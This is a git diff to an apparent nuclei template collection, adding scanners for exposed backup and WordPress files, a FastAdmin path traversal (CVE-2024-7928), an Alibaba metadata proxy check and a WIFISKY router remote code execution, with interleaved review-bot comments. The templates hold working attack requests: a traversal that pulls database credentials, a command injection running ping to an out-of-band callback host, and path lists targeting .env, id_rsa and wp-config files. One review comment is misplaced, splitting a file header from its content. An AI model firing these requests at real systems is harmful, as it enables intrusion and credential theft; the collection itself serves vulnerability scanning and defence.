diff --git a/date.txt b/date.txt
index e99b9656d6..9a7f1aceb2 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241103
+20241104
diff --git a/poc.txt b/poc.txt
index 8b2acb783e..fb151859e8 100644
--- a/poc.txt
+++ b/poc.txt
@@ -6860,6 +6860,7 @@
 ./poc/backup/snapshot-backup-518ee5abfc5c619140ace18f02fca8ee.yaml
 ./poc/backup/snapshot-backup.yaml
 ./poc/backup/urbackup-panel.yaml
+./poc/backup/vabro-backup-file-finder.yaml
 ./poc/backup/veeam-backup-azure-panel.yaml
 ./poc/backup/veeam-backup-gcp.yaml
 ./poc/backup/veritas-netbackup.yaml
@@ -44564,6 +44565,7 @@
 ./poc/cve/CVE-2024-7895.yaml
 ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
 ./poc/cve/CVE-2024-7918.yaml
+./poc/cve/CVE-2024-7928.yaml
 ./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml
 ./poc/cve/CVE-2024-7950.yaml
 ./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
@@ -57873,6 +57875,7 @@
 ./poc/exposed/webpack-sourcemap-disclosure.yaml
 ./poc/exposed/wget-hsts-list-exposure.yaml
 ./poc/exposed/wordpress-config-disclosure.yaml
+./poc/exposed/wordpress-exposure.yaml
 ./poc/exposed/wordpress-path-disclosure.yaml
 ./poc/exposed/wordpress-sensitive-config.yaml
 ./poc/exposed/wordpress-wp-config-exposure.yml
@@ -112312,6 +112315,7 @@
 ./poc/remote_code_execution/Typecho-Rce.yaml
 ./poc/remote_code_execution/VMware-CVE-2022-22954-RCE.yml
 ./poc/remote_code_execution/VOIPrce.yaml
+./poc/remote_code_execution/Wifisky-7-RCE.yaml
 ./poc/remote_code_execution/Wordpress-Social_Warfare_Plugins-RCE.yaml
 ./poc/remote_code_execution/Wordpress-force_download_Plugins-FileDownload.yaml
 ./poc/remote_code_execution/YealinkPreauthrce.yaml
@@ -131376,6 +131380,7 @@
 ./poc/wordpress/wordpress-exit-box-lite-b885aa8757fedd66d898c12224efaf9e.yaml
 ./poc/wordpress/wordpress-exit-box-lite-e4f715486bc2f2be2ab66f9091e37d49.yaml
 ./poc/wordpress/wordpress-exit-box-lite.yaml
+./poc/wordpress/wordpress-exposure.yaml
 ./poc/wordpress/wordpress-ext-adaptive-images-lfi.yaml
 ./poc/wordpress/wordpress-ext-adaptive-images-lfi.yml
 ./poc/wordpress/wordpress-ext-mailpress-rce.yaml
diff --git a/poc/backup/vabro-backup-file-finder.yaml b/poc/backup/vabro-backup-file-finder.yaml
new file mode 100644
index 0000000000..33d3ad98c6
--- /dev/null
+++ b/poc/backup/vabro-backup-file-finder.yaml
@@ -0,0 +1,140 @@
+id: backup-files
+info:
+ name: Backup Files Finder (information disclosure)
+ author: Vabro
+ severity: High
+ description: |
+ This template checks for common backup file extensions that may have been left exposed on a target.
+
+requests:
+ - name: backup-files
+ path:
+ - "/backup"
+ - "/backups"
+ - "/root"
+ - "/www"
+ - "/public_html"
+ - "/ht_docs"
+ - "/files"
+ - "/images"
+ - "/assets"
+ - "/media"
+ - "/documents"
+ - "/resources"
+ - "/wp-content/uploads"
+ method: GET
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - ".bak"
+ - ".old"
+ - ".zip"
+ - ".tar"
+ - ".tar.gz"
+ - ".tar.bz2"
+ - ".tar.xz"
+ - ".7z"
+ - ".rar"
+ - ".gz"
+ - ".bz2"
+ - ".xz"
+ - ".sql"
+ - ".db"
+ - ".bak"
+ - ".swp"
+ - ".swp"
+ - ".save"
+ - ".save"
+ - ".sav"
+ - ".sav"
+ - ".copy"
+ - ".copy"
+ - ".backup"
+ - ".backup"
+ - ".orig"
+ - ".orig"
+ - ".old"
+ - ".old"
+ - ".tmp"
+ - ".tmp"
+ - ".temp"
+ - ".temp"
+ - ".test"
+ - ".test"
+ - ".demo"
+ - ".demo"
+ - ".dev"
+ - ".dev"
+ - ".sample"
+ - ".sample"
+ - ".example"
+ - ".example"
+ - ".backup"
+ - ".backup"
+ - ".config"
+ - ".config"
+ - ".conf"
+ - ".conf"
+ - ".log"
+ - ".log"
+ - ".txt"
+ - ".txt"
+ - ".doc"
+ - ".doc"
+ - ".docx"
+ - ".xls"
+ - ".xlsx"
+ - ".ppt"
+ - ".pptx"
+ - ".pdf"
+ - ".csv"
+ - ".bak"
+ - ".bak"
+ - ".swp"
+ - ".swp"
+ - ".save"
+ - ".save"
+ - ".sav"
+ - ".sav"
+ - ".copy"
+ - ".copy"
+ - ".backup"
+ - ".backup"
+ - ".orig"
+ - ".orig"
+ - ".old"
+ - ".old"
+ - ".tmp"
+ - ".tmp"
+ - ".temp"
+ - ".temp"
+ - ".test"
+ - ".test"
+ - ".demo"
+ - ".demo"
+ - ".dev"
+ - ".dev"
+ - ".sample"
+ - ".sample"
+ - ".example"
+ - ".example"
+ - ".backup"
+ - ".backup"
+ - ".config"
+ - ".config"
+ - ".conf"
+ - ".conf"
+ - ".log"
+ - ".log"
+ - ".txt"
+ - ".txt"
+ - ".doc"
+ - ".doc"
+ - ".docx"
+ - ".xls"
+ - ".xlsx"
+ - ".ppt"
+ - ".pptx"
+ - ".pdf"
+ - ".csv"
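Review bot: The single word matcher will fire on almost any response: it has no `part:` and no companion status check, `matchers-condition: or` is set although there is only one matcher, and generic words such as `.txt`, `.log`, `.pdf` or `.csv` occur in ordinary HTML, so a directory that does not exist but answers with a custom page still counts as a finding. The word list also repeats most entries (`.bak` four times, `.backup` eight), which suggests it was pasted together rather than reviewed. Two format points: the `path:` entries carry no `{{BaseURL}}` prefix, and the file uses the `requests:` key and `severity: High` while the other templates in this commit use `http:` and lowercase severities, so it is worth checking that the repository's template validation accepts it. A tighter shape pairs a status matcher with a deduplicated body word list under `matchers-condition: and`:
```yaml
http:
  - method: GET
    path:
      - "{{BaseURL}}/backup"
      # … unchanged: the remaining directory paths, each prefixed with {{BaseURL}} …
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - ".bak"
          - ".old"
          # … unchanged: the remaining extensions, each listed once …
```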
diff --git a/poc/cve/CVE-2024-7928.yaml b/poc/cve/CVE-2024-7928.yaml
new file mode 100644
index 0000000000..2e5ec9d10a
--- /dev/null
+++ b/poc/cve/CVE-2024-7928.yaml
@@ -0,0 +1,51 @@
+id: CVE-2024-7928
+
+info:
+ name: FastAdmin < V1.3.4.20220530 - Path Traversal
+ author: s4e-io
+ severity: medium
+ description: |
+ A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
+ reference:
+ - https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
+ - https://github.com/bigb0x/CVE-2024-7928
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-7928
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7928
+ cwe-id: CWE-22
+ cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: fastadmin
+ product: fastadmin
+ fofa-query: icon_hash="-1036943727"
+ tags: cve,cve2024,fastadmin,lfi
+
+http:
+ - raw:
+ - |
+ GET /index/ajax/lang?lang=../../application/database HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'jsonpReturn('
+ - '"password":'
+ - '"username":'
+ - '"database":'
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - 'application/javascript'
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
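Review bot: The `cpe:` entry pins the single version `1.3.3.20220121`, while `name:` and the description give an open range (everything before `1.3.4.20220530`), so anything that matches on CPE will cover only one build; if the template format allows a single CPE, a comment next to it such as `# CPE names the build the PoC was verified on; affected range is < 1.3.4.20220530` stops the next reader treating it as the affected set. The trailing `# digest:` line is a signature over the rest of the file, so any later edit to this template has to be re-signed or the line dropped, otherwise nuclei will, as far as I know, treat the template as unsigned and warn on every load.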
diff --git a/poc/exposed/wordpress-exposure.yaml b/poc/exposed/wordpress-exposure.yaml
new file mode 100644
index 0000000000..f9b09655d6
--- /dev/null
+++ b/poc/exposed/wordpress-exposure.yaml
@@ -0,0 +1,84 @@
+id: wordpress-exposed-files
+
+info:
+ name: WordPress Exposed Sensitive Files Detection
+ author: Redflare-Cyber
+ severity: high
+ description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
+ tags: wordpress, exposure, creds,
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}{{file}}"
+
+ attack: clusterbomb
+
+ payloads:
+ file:
+ - /wp-config.php{{suffix}}
+ - /backup{{suffix}}
+ - /database{{suffix}}
+ - /dump{{suffix}}
+ - /wp-config.php{{archive_ext}}
+ - /backup{{archive_ext}}
+ - /database{{archive_ext}}
+ - /dump{{archive_ext}}
+ - /wp-config-sample.php
+ - /.env
+ - /.git/config
+ - /.svn/entries
+ - /.hg/requires
+ - /.bzr/branch-format
+ - /.DS_Store
+ - /debug.log
+ - /error_log
+ - /phpinfo.php
+ - /composer.lock
+ - /composer.json
+ - /id_rsa
+ - /id_rsa.pub
+ - /.htpasswd
+ - /.htaccess
+ - /logs/access.log
+ - /logs/error.log
+ - /wp-content/debug.log
+ - /wp-content/uploads/.htaccess
+ - /wp-includes/php.ini
+ - /php.ini
+ - /info.php
+ suffix:
+ - ''
+ - '~'
+ - '.bak'
+ - '.old'
+ - '.save'
+ - '.swp'
+ - '.swo'
+ - '.sql'
+ archive_ext:
+ - '.zip'
+ - '.tar.gz'
+ - '.tar.bz2'
+ - '.tar'
+ - '.gz'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - 206
+
+ - type: regex
+ part: body
+ regex:
+ - '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
+ - '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
+ - '(?i)(FTP_(USER|PASS))'
+ - '(?i)(phpinfo\(\))'
+ - '(?i)(repositoryformatversion|svn|openssl)'
+ - '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
+ - '(?i)(root:.*:(/bin/bash|/bin/sh))'
+ - '(?i)(\$cfg\["blowfish_secret"\])'
+ condition: or
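Review bot: `attack: clusterbomb` over three payload sets means every `file` entry is requested once per `suffix` × `archive_ext` combination (8 × 5), so the 23 standalone paths such as `/.env` or `/.git/config` are each fetched 40 times with an identical URL, the entries that use `{{suffix}}` are still multiplied by the unused `archive_ext` set (and vice versa), and no `max-request` is declared to make that fan-out visible. This also assumes nuclei expands the nested `{{suffix}}` inside a payload value at all, which is worth confirming, since otherwise those eight entries go out with the literal placeholder. The same file, byte for byte and with the same `id: wordpress-exposed-files`, is added again at poc/wordpress/wordpress-exposure.yaml in the last hunk of this diff, which current nuclei flags as a duplicate template id, so one copy should go. Two smaller points: `tags: wordpress, exposure, creds,` has spaces and a trailing comma, unlike the other templates here (`tags: wifisky,rce`), and `(?i)(repositoryformatversion|svn|openssl)` will match any page that merely mentions svn or openssl. Splitting the request into one clusterbomb over base name × suffix and one plain list of standalone paths removes the redundancy:
```yaml
http:
  - method: GET
    path:
      - "{{BaseURL}}{{base}}{{suffix}}"
    attack: clusterbomb
    payloads:
      base:
        - /wp-config.php
        - /backup
        - /database
        - /dump
      suffix:
        - ''
        - '~'
        - '.bak'
        # … unchanged: the remaining suffixes and the archive extensions, merged into one list …
    # … unchanged: status and regex matchers …

  - method: GET
    path:
      - "{{BaseURL}}{{file}}"
    payloads:
      file:
        - /wp-config-sample.php
        - /.env
        # … unchanged: the remaining standalone paths …
    # … unchanged: the same status and regex matchers …
```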
diff --git a/poc/other/metadata-alibaba.yaml b/poc/other/metadata-alibaba.yaml
index 7a71541371..b190f9259c 100644
--- a/poc/other/metadata-alibaba.yaml
+++ b/poc/other/metadata-alibaba.yaml
@@ -1,8 +1,9 @@
 id: metadata-service-alibaba
+
 # This attack abuses a misconfigured proxy that allows access to the metadata
 # IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
-# own metadata sevice.
+# the proxy using the full metadata URL, which the proxy will fulfill to its
+# own metadata service.
 #
 # The proxy may also be vulnerable to host/port enumeration on localhost or
 # inside the private network.
@@ -11,17 +12,20 @@ info:
 author: sullo
 severity: critical
 description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
- remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+ remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
 reference:
 - https://www.alibabacloud.com/help/doc-detail/108460.htm
 - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
 - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
- tags: exposure,config,alibaba,proxy,misconfig,metadata
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
 cvss-score: 9.3
 cwe-id: CWE-441
-requests:
+ metadata:
+ max-request: 2
+ tags: exposure,config,alibaba,proxy,misconfig,metadata
+
+http:
 - raw:
 - |+
 GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
@@ -29,7 +33,7 @@ requests:
 payloads:
 hostval:
- - alibaba.interact.sh
+ - alibaba.oast.pro
 - 100.100.100.200
 unsafe: true
 matchers:
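Review bot: The new `hostval` payload `alibaba.oast.pro` makes the first of the two requests depend on a DNS name under a third-party OAST domain resolving to the Alibaba metadata address, and nothing in the template records that assumption; if that record changes or an environment blocks the domain, the payload silently tests nothing while `100.100.100.200` still carries the check. A comment on the payload would keep the intent for the next maintainer, e.g. `# expected to resolve to 100.100.100.200; the name form covers proxies that only block the literal IP (see header comment)`. The `@@ -29,7 +33,7 @@` header counts seven old lines but only six are visible here, so one line, probably a blank one, was lost when the diff was collapsed. The raw request that uses `{{hostval}}` starts in the previous hunk and continues outside this one.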
@@ -37,3 +41,5 @@ requests:
 part: body
 words:
 - "zone-id"
+
+# digest: 490a004630440220495fde6b8e524846446e53dead7f589f22c254d0ca7b6e09e07210469773749f0220264d2180b4589c8663f68bab544d951ad739fae7f3b6dccaaacee29718cb4778:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/Wifisky-7-RCE.yaml b/poc/remote_code_execution/Wifisky-7-RCE.yaml
new file mode 100644
index 0000000000..2564f6d6b2
--- /dev/null
+++ b/poc/remote_code_execution/Wifisky-7-RCE.yaml
@@ -0,0 +1,37 @@
+id: wifisky7-rce
+
+info:
+ name: WIFISKY-7 Layer Flow Control Router - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router
+ reference:
+ - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="WIFISKY 7层流控路由器"
+ tags: wifisky,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: header
+ words:
+ - "L7Engine"
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022073b20dd539c2f97f4d77df2710669ac8a48b867a4ebe397c7c80a3a667a3c1df02200b4c8bc61b0fb453d1fff643e6880e69c4b91f3223e5cd23d5d22f8bdb6fa3fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-exposure.yaml b/poc/wordpress/wordpress-exposure.yaml
new file mode 100644
index 0000000000..f9b09655d6
--- /dev/null
+++ b/poc/wordpress/wordpress-exposure.yaml
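Review bot: This template is not a passive check — the `path:` line runs `ping -c 3 {{interactsh-url}}` on the scanned device through `confirm.php?t=`, yet neither `info.description` nor `tags` say so, so anyone selecting or excluding templates by tag cannot tell it apart from a fingerprint. nuclei-templates uses an `intrusive` tag for exactly this, so `tags: wifisky,rce,intrusive`, and the description should carry a sentence such as `Detection executes a ping to the interactsh host on the target device (command execution).`. The only reference is a third-party GitHub write-up with no vendor advisory or CVE, and `verified: true` would be more useful with a note of what was verified and on which firmware build. The `matchers-condition: and` over the `dns` interaction, the `L7Engine` header and the 200 status is a sound combination and needs no change.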
@@ -0,0 +1,84 @@
+id: wordpress-exposed-files
+
+info:
+ name: WordPress Exposed Sensitive Files Detection
+ author: Redflare-Cyber
+ severity: high
+ description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
+ tags: wordpress, exposure, creds,
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}{{file}}"
+
+ attack: clusterbomb
+
+ payloads:
+ file:
+ - /wp-config.php{{suffix}}
+ - /backup{{suffix}}
+ - /database{{suffix}}
+ - /dump{{suffix}}
+ - /wp-config.php{{archive_ext}}
+ - /backup{{archive_ext}}
+ - /database{{archive_ext}}
+ - /dump{{archive_ext}}
+ - /wp-config-sample.php
+ - /.env
+ - /.git/config
+ - /.svn/entries
+ - /.hg/requires
+ - /.bzr/branch-format
+ - /.DS_Store
+ - /debug.log
+ - /error_log
+ - /phpinfo.php
+ - /composer.lock
+ - /composer.json
+ - /id_rsa
+ - /id_rsa.pub
+ - /.htpasswd
+ - /.htaccess
+ - /logs/access.log
+ - /logs/error.log
+ - /wp-content/debug.log
+ - /wp-content/uploads/.htaccess
+ - /wp-includes/php.ini
+ - /php.ini
+ - /info.php
+ suffix:
+ - ''
+ - '~'
+ - '.bak'
+ - '.old'
+ - '.save'
+ - '.swp'
+ - '.swo'
+ - '.sql'
+ archive_ext:
+ - '.zip'
+ - '.tar.gz'
+ - '.tar.bz2'
+ - '.tar'
+ - '.gz'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - 206
+
+ - type: regex
+ part: body
+ regex:
+ - '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
+ - '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
+ - '(?i)(FTP_(USER|PASS))'
+ - '(?i)(phpinfo\(\))'
+ - '(?i)(repositoryformatversion|svn|openssl)'
+ - '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
+ - '(?i)(root:.*:(/bin/bash|/bin/sh))'
+ - '(?i)(\$cfg\["blowfish_secret"\])'
+ condition: or